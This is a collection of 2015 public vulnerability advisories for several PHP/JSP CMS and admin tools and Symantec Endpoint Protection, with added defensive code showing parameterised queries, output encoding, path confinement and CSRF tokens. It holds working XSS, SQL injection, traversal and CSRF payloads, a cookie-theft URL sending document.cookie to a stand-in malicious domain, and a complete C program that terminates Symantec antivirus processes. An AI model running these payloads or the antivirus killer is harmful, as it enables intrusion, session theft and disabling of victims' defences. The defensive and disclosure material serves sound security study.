http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number]
Inject alert(666) in author input field.



Disclosure Timeline:
=
Vendor Notification: NA
June 12, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s): [+] GET & POST


Vulnerable Product:[+] ZCMS_1.1


Vulnerable Parameter(s):   [+] pass, title, content, author
   

Affected Area(s):  [+] Admin, CMS
   

===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that
it is not altered except by reformatting it, and that due credit is given. 
Permission is
explicitly given for insertion in vulnerability databases and similar, provided 
that
due credit is given to the author. The author is not responsible for any misuse 
of the
information contained herein and prohibits any malicious use of all security 
related
information or exploits by the author or elsewhere.


(hyp3rlinx)
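Added example, not part of the ZCMS or JSPMyAdmin advisories above nor of either project's code: the two concatenated queries those posts quote (the ZCMS `squerry` login check and the `deletedata.jsp` DELETE), rebuilt in Python on sqlite3 so the PoC inputs can be run offline, each beside a hardened form. `TABLE_PREFIX`, the schema, the sample rows and the function names are constructed for this demo.

```python
import re
import sqlite3
from typing import Dict

TABLE_PREFIX = "zcms_"  # stand-in for the JSP constant used in the ZCMS query
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def make_db() -> sqlite3.Connection:
    """Constructed schema: one ZCMS-style admin row and a small 'email' table."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE {TABLE_PREFIX}users(username TEXT, password TEXT,
                                         status INTEGER, type INTEGER);
        INSERT INTO {TABLE_PREFIX}users VALUES ('admin', 's3cret', 0, 1);
        CREATE TABLE email(CATID INTEGER, NAME TEXT);
        INSERT INTO email VALUES (7, 'a'), (8, 'b'), (9, 'c');
    """)
    return con


def admin_login_concat(con, username: str, password: str) -> bool:
    """The ZCMS login query as posted: every value concatenated into the SQL.
    A password of  HELL' OR '2'='2  turns the WHERE clause into
    (... AND password = 'HELL') OR ('2'='2' AND type = 1), which is true."""
    squerry = ("SELECT COUNT(username) AS usercount FROM " + TABLE_PREFIX
               + "users WHERE status = 0 AND username = '" + username
               + "' AND password = '" + password + "' AND type = 1 ;")
    return con.execute(squerry).fetchone()[0] > 0


def admin_login_param(con, username: str, password: str) -> bool:
    """Same query with bound parameters: the quote in the password is data."""
    squerry = ("SELECT COUNT(username) AS usercount FROM " + TABLE_PREFIX
               + "users WHERE status = 0 AND username = ? AND password = ?"
               + " AND type = 1")
    return con.execute(squerry, (username, password)).fetchone()[0] > 0


def delete_concat(con, table: str, field: str, val: str) -> int:
    """deletedata.jsp as posted: prepareStatement() is called, but with no '?'
    placeholders, so table, field and val are all still concatenated.
    Returns the number of rows deleted."""
    sql = "DELETE FROM " + table + " WHERE " + field + "='" + val + "'"
    return con.execute(sql).rowcount


def delete_safe(con, table: str, field: str, val: str) -> int:
    """Identifiers cannot be bound parameters, so they are checked against the
    live schema and quoted; only the value is bound.  Raises ValueError on
    anything that is not a known table/column."""
    if not IDENT.match(table) or not IDENT.match(field):
        raise ValueError("identifier contains characters outside [A-Za-z0-9_]")
    columns = [row[1] for row in con.execute(f"PRAGMA table_info({table})")]
    if not columns:
        raise ValueError(f"unknown table {table!r}")
    if field not in columns:
        raise ValueError(f"unknown column {field!r}")
    return con.execute(f'DELETE FROM "{table}" WHERE "{field}" = ?',
                       (val,)).rowcount


def demo() -> Dict[str, object]:
    """Run both PoC inputs from the posts against fresh databases."""
    bypass_pw = "HELL' OR '2'='2"            # ZCMS 'pass' field payload
    inj_field = "CATID or 'field'='NAME'"    # deletedata.jsp 'field' payload
    con = make_db()
    results = {
        "concat_login_bypassed": admin_login_concat(con, "admin", bypass_pw),
        "param_login_bypassed": admin_login_param(con, "admin", bypass_pw),
        "param_login_real_pw": admin_login_param(con, "admin", "s3cret"),
        # WHERE CATID or 'field'='NAME'='' is true for every row: all 3 go
        "concat_rows_deleted": delete_concat(make_db(), "email", inj_field, ""),
        "safe_rows_deleted": delete_safe(make_db(), "email", "CATID", "7"),
    }
    try:
        delete_safe(make_db(), "email", inj_field, "")
        results["safe_rejected_payload"] = False
    except ValueError:
        results["safe_rejected_payload"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```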


mysql-lite-administrator XSS vulnerabilities

2015-06-23 Thread apparitionsec
[+] Credits:  hyp3rlinx

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt



Vendor:
=
code.google.com/p/mysql-lite-administrator



Product:
==
mysql-lite-administrator(beta1)



Advisory Information:
==
Multiple XSS vulnerabilities



Vulnerability Details:
==
mysql-lite-administrator is vulnerable to XSS attacks. The application escapes 
injected strings, e.g. 'HELL' becomes \'HELL\', but we can easily defeat that 
using the Javascript functions String.charCodeAt() & String.fromCharCode().


XSS Exploit code(s):


http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76))

http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666)

http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76))

http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666)



Disclosure Timeline:
=
Vendor Notification: NA
June 21, 2015 : Public Disclosure



Severity Level:
=
Med



Description:
==

Request Method(s): [+] GET 


Vulnerable Product:[+] mysql-lite-administrator (beta1)


Vulnerable Parameter(s):   [+] table_name, num_row
   

Affected Area(s):  [+] tabella.php & coloni.php
   

===



(hyp3rlinx)
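The escaping issue described in this post, as an added example that is not part of the advisory or of mysql-lite-administrator: backslash-escaping quotes (addslashes() or the old magic quotes) only changes how a value behaves inside a SQL string literal, while the browser interprets the same value in an HTML context where angle brackets and parentheses are untouched, which is why a quote-free payload built with String.fromCharCode() still runs. The hardened handler encodes for HTML at output time and, for something that is an identifier like table_name, validates it against a whitelist pattern before use. Function names and the sample inputs are constructed for the illustration.

```php
<?php
// Added example (not mysql-lite-administrator code): why addslashes() is not
// an XSS defence, and what to do instead.

// What the advisory describes: quotes get backslash-escaped, which only matters
// inside a SQL string literal. Angle brackets and parentheses pass straight through.
function render_table_heading_weak(string $tableName): string
{
    $escaped = addslashes($tableName);
    return "<h2>Table: " . $escaped . "</h2>";
}

// Hardened form: encode for the HTML context at the moment of output.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE avoids returning '' on bad UTF-8.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_table_heading_safe(string $tableName): string
{
    return "<h2>Table: " . h($tableName) . "</h2>";
}

// Stricter still: a table name is an identifier, so it can be validated against
// a whitelist pattern before it is used anywhere (SQL or HTML). That also removes
// the temptation to interpolate it into a query string.
function is_valid_identifier(string $name): bool
{
    return preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $name) === 1;
}

// Constructed sample inputs: a benign name and a quote-free payload in the
// style the advisory uses (no quotes, so addslashes() has nothing to escape).
$samples = [
    'customers',
    '<script>alert(String.fromCharCode(72,69,76,76))</script>',
];

foreach ($samples as $input) {
    echo "input:  $input\n";
    echo "weak:   " . render_table_heading_weak($input) . "\n"; // payload survives unchanged
    echo "safe:   " . render_table_heading_safe($input) . "\n"; // '<' and '>' become &lt; and &gt;
    echo "ident:  " . (is_valid_identifier($input) ? 'accepted' : 'rejected') . "\n\n";
}
```

The point to take from the output is that the weak variant returns the payload byte-for-byte, because none of the characters addslashes() cares about are present; the safe variant neutralises it regardless of whether quotes were used.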


GeniXCMS XSS Vulnerabilities

2015-06-23 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-GENIXCMS0621.txt



Vendor:
=
genixcms.org



Product:
=
GeniXCMS v0.0.3 is a PHP based content management system



Advisory Information:
===
Multiple persistent & reflected XSS vulnerabilities



Vulnerability Details:
=
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS 


XSS Exploit code(s):


Persistent XSS:
---
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=

1- content input field
content-injected XSS will execute after the posting is published.

2- title input field
title-injected XSS will execute immediately.


Reflected XSS:
-
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'alert('XSS By Hyp3rlinx')



Disclosure Timeline:
=
Vendor Notification: NA
June 21, 2015 : Public Disclosure



Severity Level:
=
Med



Description:
=

Request Method(s): [+] GET & POST 


Vulnerable Product:[+] GeniXCMS 0.0.3 


Vulnerable Parameter(s):   [+] q, content & title
   

Affected Area(s):  [+] index.php
   

===



(hyp3rlinx)


novius-os.5.0.1 Persistent XSS, LFI & Open Redirect Vulnerabilities

2015-06-29 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt



Vendor:
===
community.novius-os.org


Product:
===
novius-os.5.0.1-elche is a PHP-based Content Management System
community.novius-os.org/developpers/download.html



Advisory Information:
===
Persistent XSS, LFI & Open Redirect



Vulnerability Details:
==

Persistent XSS:
---
Users can inject XSS payloads that will be saved to the MySQL DB, where they will
execute each time they are accessed.

1- In Admin under 'Media Center' users can inject XSS payloads and save them in
the 'media_title' field of a saved media file: create a new media page, inject
the payload, click save and then select visualize.

2- Under the Website menus area users can inject XSS payloads and save them in
the 'menu_title' field of a Website menu.

If we view the browser source code at
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview
the XSS is output as HTML entities.

e.g. 


But within the same webpage for  tag you can see it is not.

e.g.
alert('HELL')


Local File Inclusion:
-
We can use directory traversal to access and read files outside of the current
working directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../



Open Redirect:
--
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=
is open to abuse by supplying a malicious location or file.



XSS Exploit code(s):

In 'Media Center' create a new media file, click edit and inject the XSS payload
into the 'title' field, click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1

vulnerable parameter:
media_title

In 'Website Menu' create a new website menu item and inject the XSS payload,
click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1

vulnerable parameter:
menu_title



LFI:

http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt
 
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php



Open Redirect:
--
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com



Disclosure Timeline:
==
Vendor Notification: NA
June 29, 2015 : Public Disclosure



Severity Level:
=
Med



Description:


Request Method(s): [+] GET & POST 


Vulnerable Product:[+] novius-os.5.0.1-elche


Vulnerable Parameter(s):   [+] media_title, menu_title, tab, redirect
   

Affected Area(s):  [+] Login, Web Pages, Media Center & Website Menu 
area
   

=



(hyp3rlinx)
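The two server-side parameter problems in this post, the 'tab' value that reaches the filesystem and the 'redirect' value consumed after login, as an added example that is not Novius OS code. It shows the checks a defender would put in front of each: a path-selecting parameter is restricted to plain segments, resolved with realpath() and confined to a fixed base directory; a redirect parameter is accepted only as a local absolute path with no scheme, host or protocol-relative prefix. The directory layout, the '.php' suffix appended to the tab value and the default landing page are assumptions made for the illustration.

```php
<?php
// Added example, not Novius OS code: confining a 'tab'-style parameter that
// selects a server-side file, and validating a post-login 'redirect' target.
// Directory layout, the '.php' suffix and the default landing page are assumptions.

// Returns the absolute path of the requested view, or null when the request
// escapes the base directory, names a file that does not exist, or contains
// anything other than plain '/'-separated path segments.
function resolve_tab(string $baseDir, string $tab): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Only letters, digits, '_' and '-' per segment: this rejects '..', absolute
    // paths, NUL bytes and dotted file names before any filesystem call is made.
    if (!preg_match('#\A[A-Za-z0-9_\-]+(/[A-Za-z0-9_\-]+)*\z#', $tab)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $tab . '.php');
    if ($candidate === false) {
        return null;
    }
    // realpath() has resolved symlinks; the result must still sit under $base.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Returns a redirect target that stays on this application. Anything with a
// scheme, a host, a protocol-relative '//' prefix, a backslash or a control
// character falls back to $default.
function safe_redirect_target(string $redirect, string $default = '/admin/'): string
{
    if ($redirect === '' || strlen($redirect) > 2048) {
        return $default;
    }
    if (!preg_match('#\A/(?![/\\\\])#', $redirect)) {
        return $default;             // must start with exactly one '/', not '//' or '/\'
    }
    if (preg_match('/[\x00-\x1F\x7F]/', $redirect)) {
        return $default;             // CR/LF would allow Location header injection
    }
    $parts = parse_url($redirect);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $redirect;
}

// --- demo on constructed input -------------------------------------------
// A throwaway base directory with one legitimate view so the accept path is visible.
$base = sys_get_temp_dir() . '/tab_demo_' . getmypid();
mkdir($base . '/admin', 0700, true);
file_put_contents($base . '/admin/dashboard.php', "<?php // placeholder view\n");

foreach (['admin/dashboard', '../../../../xampp/phpinfo.php', '../../../SENSITIVE-FILE.txt'] as $t) {
    printf("tab %-34s -> %s\n", $t, resolve_tab($base, $t) ?? 'rejected');
}
foreach (['/admin/', 'http://www.SATANSBRONZEBABYSHOES.com', '//evil.example', '/\\evil.example'] as $r) {
    printf("redirect %-38s -> %s\n", $r, safe_redirect_target($r));
}

unlink($base . '/admin/dashboard.php');
rmdir($base . '/admin');
rmdir($base);
```

The whitelist regex does most of the work for the path case; the realpath() plus prefix comparison is the backstop that also catches symlinks inside the base directory pointing elsewhere. For the redirect case, a relative path is the only thing worth accepting from the request; anything that needs to leave the site should be a server-side lookup of an allowed destination, not a user-supplied URL.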


phpLiteAdmin v1.1 CSRF & XSS Vulnerabilities

2015-07-06 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPLITEADMIN0705.txt



Vendor:

bitbucket.org/phpliteadmin



Product:

phpLiteAdmin v1.1



Advisory Information:

CSRF & XSS Vulnerabilities



Vulnerability Details:
==


CSRF:
--
No CSRF token exists when making calls to various SQL operations, therefore we
can get a user to drop whole database tables if they click on our malicious
link and the table name is known.


XSS:
--
There are three XSS vulnerabilities I point out: the first is the use of
'PHP_SELF', the second is an unsanitized parameter for the SQL statement when
calling the drop table method, e.g.
'http://localhost/phpliteadmin.php?droptable=[XSS]'
and the third is an unsanitized 'table' parameter, e.g.
'http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'

Let's look at the first one more in depth as it's more fun.
phpliteadmin uses a PHP reserved server variable $_SERVER['PHP_SELF'], which is
vulnerable if not used correctly, allowing us to inject an XSS payload to steal
session cookies and navigate them to a place of our choosing in order to cause
mayhem.

On line 32 of 'phpliteadmin.php' we find vulnerable code:


//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']); 
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];

//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
---

In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document root."
ref: http://php.net/manual/en/reserved.variables.server.php

It is known that $_SERVER['PHP_SELF'] can make your application insecure, as we
can inject code following a forward slash "/". But we have a slight problem to
overcome: we can execute code, but our forward slashes will not be processed
correctly and the exploit will FAIL!, leaving us with the following useless URL
instead of taking the victim to a domain of our choice.


Fail exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"

Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org


But all is NOT lost! We will construct our malicious URL forward slashes in our
JS call to the window.open() method using String.charCodeAt(58) for ':' and
String.charCodeAt(47) for '/', which will NOW give us what we seek: control over
the user's browser, taking them to some terrible dark place.

Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:

Tada!, our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var
 
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'hyp3rlinx.altervista.org';window.open(x);})()"


Exploit code(s):
===

XSS(s) POC:
--
  

1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and 
sends to remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var
 
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"


2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=alert(666)


3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table="/>alert(666)



CSRF POC:
-
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1



Disclosure Timeline:
=


Vendor Notification:  NA
July 5, 2015  : Public Disclosure



Severity Level:
=
Med



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] phpliteadmin_v1-1


Vulnerable Parameter(s):[+] $_SERVER['PHP_SELF'], droptable, table


Affected Area(s):   [+] Admin


===



(hyp3rlinx)
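Why $_SERVER['PHP_SELF'] carries attacker-controlled data, and what the fix looks like, as an added example that is not phpLiteAdmin code. Under the CGI variable rules PHP_SELF is SCRIPT_NAME followed by PATH_INFO, so a request for /phpliteadmin.php/<anything> puts <anything> into PHP_SELF even though the script that ran is still phpliteadmin.php; the explode('/') shown in the post then selects exactly that trailing segment. The example reproduces that derivation on a constructed request, derives the name from SCRIPT_NAME instead, and encodes the value for the attribute it is written into. The constructed $_SERVER array and the fallback file name are assumptions for the illustration.

```php
<?php
// Added example (not phpLiteAdmin code): PHP_SELF vs SCRIPT_NAME.
//
// For a request to /phpliteadmin.php/";'onMouseOver="...  the server reports
//   SCRIPT_NAME = /phpliteadmin.php            (the script that actually ran)
//   PATH_INFO   = /";'onMouseOver="...          (the trailing, user-supplied part)
//   PHP_SELF    = SCRIPT_NAME . PATH_INFO        (hence the user-controlled suffix)

// Reproduces the derivation quoted in the advisory on a constructed request so
// the difference is visible. This is the pattern to avoid, not to copy.
function page_name_from_php_self(string $phpSelf): string
{
    $nameArr = explode('?', $phpSelf);
    $thisName = $nameArr[0];
    $nameArr = explode('/', $thisName);
    return $nameArr[count($nameArr) - 1];
}

// Hardened: take the name from SCRIPT_NAME, which never includes PATH_INFO,
// reduce it to a basename and restrict it to a known-safe character set.
function page_name_safe(array $server): string
{
    $name = basename($server['SCRIPT_NAME'] ?? '');
    if (!preg_match('/\A[A-Za-z0-9_.\-]+\z/', $name)) {
        $name = 'phpliteadmin.php';   // assumed fallback; never trust an odd value
    }
    return $name;
}

// Whatever the source, the value must be encoded for the context it lands in.
// Inside action="..." that means htmlspecialchars() with ENT_QUOTES, so a
// double quote can no longer terminate the attribute.
function form_action_attr(string $page): string
{
    return 'action="' . htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '"';
}

// Constructed $_SERVER-like array with the request shape from the advisory.
$server = [
    'SCRIPT_NAME' => '/phpliteadmin_v1-1/phpliteadmin.php',
    'PATH_INFO'   => '/";\'onMouseOver="alert(1)"',
];
$server['PHP_SELF'] = $server['SCRIPT_NAME'] . $server['PATH_INFO'];

echo "PHP_SELF derived  : " . page_name_from_php_self($server['PHP_SELF']) . "\n"; // the payload
echo "SCRIPT_NAME based : " . page_name_safe($server) . "\n";                       // phpliteadmin.php
echo "encoded regardless: " . form_action_attr(page_name_from_php_self($server['PHP_SELF'])) . "\n";
```

Both halves matter: switching the source to SCRIPT_NAME removes the attacker's input from the value, and encoding at output protects the page even if some other code path later feeds it untrusted data. Disabling PATH_INFO handling at the web server is a third, configuration-level control for applications that never use it.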


Symantec EP 12.1.4013 Disabling Vulnerability

2015-07-08 Thread apparitionsec
#include 
#include 
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal:
Kill Symantec EP agent & services after globally locking down endpoint 
protection via the
Symantec central management server and enabling globally managed password 
protection controls. Tested successfully on Windows 7 SP1 result may vary OS to 
OS.

Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...

*/

void el_crookedio_crosso(const char *victimo){ 
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);

while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE 
hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}

DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}

void angelo_maliciouso(){
   int AV=exeo_de_pid(SMC_EXE);
   char id[8];
   sprintf(id, "%d ", AV);
   printf("%s", id);
   char cmd[50]="Taskkill /F /PID ";
   strcat(cmd, id);
   system(cmd);
   
  // system("Taskkill /F /IM Smc.exe");  //Access denied.
  system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint 
Protection\\Smc.exe\" -disable -ntp");

  Sleep(1000);
  
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

}

int main(void){

puts("/*---*/\n");
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013|\n");
puts("|  By hyp3rlinx - Jan 2015|\n");
puts("/**/\n");

   SetDebugPrivileges();
   angelo_maliciouso(); 

   Sleep(1000);
  
   el_crookedio_crosso(SMC_EXE);
   el_crookedio_crosso(SMC_GUI);
   el_crookedio_crosso(CC_SVC_HST);

   Sleep(2000);
   angelo_maliciouso();

   Sleep(6000);
   
   return 0;
}

int SetDebugPrivileges(){ 
DWORD err=0; 
TOKEN_PRIVILEGES Debug_Privileges; 

if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return
 GetLastError(); 
HANDLE hToken=0; 

if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ 
err=GetLastError();   
if(hToken)CloseHandle(hToken); 
return err; 
} 
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 
Debug_Privileges.PrivilegeCount=1; 

if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ 
err=GetLastError(); 
if(hToken) CloseHandle(hToken); 
} 
return err; 
}


phpSQLiteCMS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS

2015-07-13 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPSQLITECMS0712.txt



Vendor:

phpsqlitecms.net



Product:

ilosuna-phpsqlitecms-d9b8219


Advisory Information:
==
CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities.
Users will be affected if they visit a malicious website or click any infected
link, possibly resulting in malicious attackers taking control of the Admin /
CMS area.


Vulnerability Details:
=

CSRF:
-
We can add arbitrary users to the system, delete arbitrary web server files
and escalate privileges, as no CSRF token is present.

Add arbitrary user:
---
The following request variables are all that is needed to add users to the system.
mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"


Privilege escalation:
-
Under the users area in admin we can easily gain admin privileges; again using
the CSRF vulnerability we submit the form using our id and change the request
variable 'type' to '1', granting us admin privileges.

e.g.

mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1   <--make us admin


Delete arbitrary files:

The following request parameters are all we need to delete files from the media
or files directories under the web server's CMS area.

mode=filemanager
directory=files
delete=index.html
confirmed=true


XSS:
-
We can steal PHP session cookie via XSS vulnerability 


Unrestricted File Type Upload:
--
The files & media dirs will happily take .PHP, .EXE etc., and PHP scripts, when
selected, will execute whatever PHP script we upload.


Exploit code(s):
===

1- CSRF POC Add arbitrary users to the system.
-


function doit(){
var e=document.getElementById('evil')
e.submit()
}




http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php";
 method="post">








2- CSRF privilege escalation POST URL:
--
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php


Privilege escalation request string:

mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1


3- CSRF Delete Arbitrary Server Files:
--
The request URL below will delete the index.html file in the files dir on the
web server without any type of request validation, CSRF token etc.


http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
&directory=files&delete=index.html&confirmed=true


XSS steal PHP session ID POC:
-
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&;
edit=49&comment_id="/>alert('XSS by hyp3rlinx 
'%2bdocument.cookie)&page=1 


Disclosure Timeline:
=


Vendor Notification:  NA
July 12, 2015  : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s): [+] POST & GET


Vulnerable Product:  [+] ilosuna-phpsqlitecms-d9b8219


Vulnerable Parameter(s):  [+] comment_id, delete, type, new_user_submitted


Affected Area(s):  [+] Admin & CMS 


===



(hyp3rlinx)
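The synchronizer-token check whose absence this post (and the phpLiteAdmin droptable post above it) turns into add-user, delete-file and drop-table requests, as an added example that is not phpSQLiteCMS or phpLiteAdmin code. One random token is issued per session, embedded in every state-changing form, and compared in constant time on POST; GET requests are refused for state-changing modes outright, which on its own kills the ?mode=filemanager&delete=...&confirmed=true style of link. The session cookie is also marked SameSite and HttpOnly so the browser does not attach it to cross-site POSTs and script cannot read it. Mode names and field names are assumptions for the illustration.

```php
<?php
// Added example (not phpSQLiteCMS or phpLiteAdmin code): CSRF tokens for
// state-changing requests. Mode and field names are assumptions.

// Issue one random token per session and reuse it for all forms in that session.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Validate a submitted token. hash_equals() avoids leaking the token
// byte-by-byte through timing. Any non-POST request fails, so a GET such as
// ?mode=filemanager&delete=index.html&confirmed=true can never change state.
function csrf_check(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if (!is_string($given) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// A dispatcher that refuses state-changing modes without a valid token.
function dispatch(array $server, array $get, array $post, array $session): string
{
    $mode = $post['mode'] ?? $get['mode'] ?? 'view';
    $stateChanging = ['users', 'filemanager', 'droptable'];
    if (in_array($mode, $stateChanging, true) && !csrf_check($server, $post, $session)) {
        return "403: missing or invalid CSRF token for mode '$mode'";
    }
    return "ok: mode '$mode' accepted";
}

// Cookie hardening that goes with the token. SameSite keeps the browser from
// sending the session cookie on cross-site POSTs at all; HttpOnly keeps script
// (including the XSS described in the same advisory) from reading it.
// Call before session_start().
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// Constructed requests: the advisory's GET-based delete, a cross-site POST
// with no token, and a same-origin POST carrying the session's token.
$session = ['csrf_token' => bin2hex(random_bytes(32))];
$cases = [
    [['REQUEST_METHOD' => 'GET'],  ['mode' => 'filemanager', 'delete' => 'index.html', 'confirmed' => 'true'], []],
    [['REQUEST_METHOD' => 'POST'], [], ['mode' => 'users', 'new_user_submitted' => 'true', 'name' => 'x']],
    [['REQUEST_METHOD' => 'POST'], [], ['mode' => 'users', 'csrf_token' => $session['csrf_token']]],
];
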